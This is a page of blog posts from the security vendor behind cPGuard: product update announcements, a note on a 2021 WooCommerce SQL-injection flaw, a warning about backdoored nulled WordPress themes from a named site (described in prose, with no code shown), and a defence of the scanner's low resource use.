by Nibin VM | Mar 24, 2022 | Others
We are happy to announce that we expect to start cPGuard v4 client beta testing by the first week of April 2022. Version 4 of cPGuard is not just a typical update with some UI improvements and new features. It is a complete revamp which introduces a fresh UI with an incredible new workflow. We have built a new framework that opens endless possibilities for integrations onto multiple platforms. We are trying our best to make each component perfect and for a trouble-free upgrade from V3 to V4. As it is a new software model, there are a few things you need to notice about V4 features and requirements.
What are the new features in V4?
- Centralized server management :- In cPGuard V4, you have an option to view and manage all your servers from our Cloud-based user interface. This will make your life easier especially when you need to check cPGuard on multiple servers.
- User-based access :- You can define an access matrix for your server managers to your servers without giving them root access. You can create multiple users and grant access flexibly on your servers
- Server overview reports :- From the centralized UI, you will get an overview of the attack rate against your servers, servers with alerts, etc
- Control Panel independent :- We are crafting cPGuard V4 as control panel independent. So we can support more control panels soon and can introduce more features into cPGuard.
Requirements for cPGuard V4
As it is a new software model, the requirements to run cPGuard also change a bit compared to previous versions.
- App Cloud should be able to communicate to the agent installed on the customer’s servers. So the cPGuard Cloud IPs must have whitelisted on client servers or the software will not function well. We will add an automatic whitelist for CSF and in other cases, the user must do manual whitelisting of the IPs that we provide.
- The supported Operating System list is updated and we support almost all RHEL and Debian derivatives now. But cPGuard version 4 will not support CentOS 6.x and Debian 9.
- The UI will be centralized, so you need to login into the cPGuard dashboard separately using your OPSSHIELD client area login credentials.
- You may notice some missing data in V4 dashboard initially, which is fine because those are the new metrics for V4. We try to import all V3 data to V4 during the upgrade but new metrics need to populate from the new data collecting system
Do you need to take any action now?
You do not need to take any action now. We will roll the existing servers into V4 sequentially with multiple updates. During the process, we will alert the customers if any of the requirements cannot meet and you can resolve it manually to prepare your servers for V4 update. We hope that we can release V4 within a couple of weeks.
Stay tuned to our Social media accounts to get additional information about cPGuard V4.
by Nibin VM | Jan 27, 2022 | Others
We have released cPGuard version 3.69 on January 26 2022 and the update is available on all servers automatically. We encourage our customers to make sure that they use the latest version always as we follow sequential updates and every update is applicable for the latest versions of the software.
What is up with version 3.69?
We release regular updates to our software, scanner rules, WAF rules, etc to make sure that everything is up to date to detect the latest threats. For a person who follows the release notes of cPGuard, the new version may not feel anything exciting!
But it took up almost 2 months to complete this build as it has a completely revamped scanner engine code. Our developers have re-written the whole code from scratch to make it more efficient and organized. As a project which is running for over 4 years and started as a specific control panel plugin, we believe this is the right time to start working on the project revamp to enter into new areas
The major changes
Our team is working on some cPGuard enhancements and internally calls it cPGuard V4. So version 3.69 is the first step towards V4 release and we will soon release the following updates in the upcoming versions. In 3.69, the major changes include
- Revamped scanner engine code
- Eliminated the dependency with system ClamAV
- Enhanced file checks and improved scanner speed
What is next?
As I mentioned above, 3.69 is just the first step towards a milestone. Our team is working hard to increase the cPGuard productivity and reduce the admin overhead. We will have some major updates this year and we believe that it can help our customers to manage cPGuard and the servers easily.
by Nibin VM | Jul 22, 2021 | Others
On 15th July 2021, a critical SQL-injection security vulnerability in the WooCommerce e-commerce platform and a related plugin was reported which might affect millions of websites around the world. The vulnerabilities were detected on the 13th of July and fixed in WooCommerce versions 3.3.6 to 5.5.1 and WooCommerce Blocks versions 2.5.16 to 5.5.1. Though they pushed a forced automatic update to all affected websites, it is recommended to manually check your website and make sure that everything is up to date.
What is the exploit impact? As per the announcement from WooCommerce, this vulnerability allows an unauthenticated attacker to access arbitrary data in an online store’s database. If a store was affected, the exposed information will be specific to what that site is storing but could include order, customer, and administrative information
So what is an SQL Injection attack and how to prevent it? SQL injection is a web security vulnerability that allows an attacker to interfere with the SQL queries that an application makes to its database. This type of vulnerability allows a malicious hacker to affect the database in a way that makes it display information or behave differently in ways it’s not supposed to. This is a common attack vector and can be mostly detected using some website auditing tools. The developer of every application must do proper validation of the user input through any form or from the URI and filter them properly.
Can cPGuard protect your website from such vulnerabilities? Yes, the cPGuard WAF is powered by Malware.Expert ModSec rules set can protect your websites from such generic attacks including SQL injection. So cPGuard can already defend against such attacks and protect your websites. It also works along with the IPDB Distributed Firewall module which can detect and block the repeated attacking IPs on all our customer servers.
by Nibin VM | Jul 16, 2021 | Others
The subject is pretty familiar for most of the WordPress developers and people who maintain the websites. Everyone who takes their website security seriously will honor the advice but there are still some people who wish to take short-cuts and install nulled themes and plugins. Such people are not saving money to add more modules to their website, rather opening a remote website management option to the hacker.
We have added some articles before about such websites which you should not relay to download the plugins or themes. Today I am going to talk about another such website, which is “freewordpresthemes [dot] com”. They are offering a few WordPress themes which you can download free from their website and they are packed with Malware inside. We found them during our regular inspection through the reported malware by our scanner engine. So the cPGuard scanner engine already protects you from the particular malware injected into their package.
So now let us take a look into the actual injection in their package. We found the below injected code in their “functions.php” file which is actually referring to a TXT file in their website.
The injected code actually pulls some code from their website, creates a new file under the public space of the website, adds some code to it which is the remote hand for the hackers.
So what does that mean? Yes, installing and enabling this theme means you have opened up your website to an anonymous person who can make changes to your website without permission.
So how can you escape from such threats? There is only one answer to that…download the themes and plugins from reliable sources. You should be ready to pay for the software that is going to serve your requirements or you should find some alternate options instead of opting for such short-cuts. Even though there are numerous incidents and reports around there regarding such issues, people who do not act wisely will end up in such troubles.
You can also deploy security solutions like cPGuard on your server to protect you from such threats. But ultimately it is not recommended to use any nulled software if security matters!
by Nibin VM | Mar 27, 2021 | CPGUARD
What do you mean by resource consumption?
Every software needs some resources to run on a system and perform its operations. The amount of resources each program need is different and depends on the task it performs. Softwares that need to run multiple algorithms, do complex computations and has a lot of file and network operations are usually highly resource-intensive (specifically CPU, RAM and Disk IO). An anti-virus scanner come under this category as there are a large number of file read writes, content analysis, pattern recognition and comparisons to be performed.
On a server environment resources and limited and required to be available on-demand for the servers primary task. Therefore antivirus scanners have settings to adjust the resources it can consume or schedule the scanner to run in off-peak hours.
So why cPGuard does not allow users to limit it?
We have strictly maintained a “performance-oriented” approach while building cPGuard and wanted it to run smoothly on the smallest of servers. The cPGuard scanner engine core is built to work fast and consume minimal resources. Some of the major points that help us achieve better performance with lower resources are
- We scan only relevant files/locations, unlike the competitors where they scan a lot of unnecessary locations and waste server resources.
- Our core scanner is single-threaded and will not cause a total server spike. So CPU limiting is not required for our scanner daemon
- Our highly efficient and optimised algorithms leave only a very small memory footprint.
- Our IPDB rules contain only active attack sources and thus load only minimal rules and reduce network overhead
- WAF contains only minimal but generic rules which effectively block most and major web attacks
Do you have any proof?
Yes, we have and we can confidently claim our statement. The biggest proof is that in the last 4 years the complaints due to resource usage are close to ZERO. The major portion of most systems that can cause a load spike on the server is the scanner module. Our scanner is fine-tuned to avoid such a scenario and it is one of the fastest scanners available in the market. It is tested and confirmed that the cPGuard scanner engine is more than 7x faster than that of our competitors. The screenshot below of the manual scan option in cPGuard, where it completed scanning 41K+ files in just 7 mins.
So is there any advantage with Resource Consumption settings?
Yes, there is if the scanner module is resource hungry. It will help to reduce server load but it will drastically slow down the scanning process and will engage resources for a longer time. As I stated earlier, that is not a problem with cPGuard and you do not need to worry about setting up such values and monitoring our services.
Ok, I have few more questions…
We are happy to address them…feel free to reach our support team and we will be more than happy to answer your questions!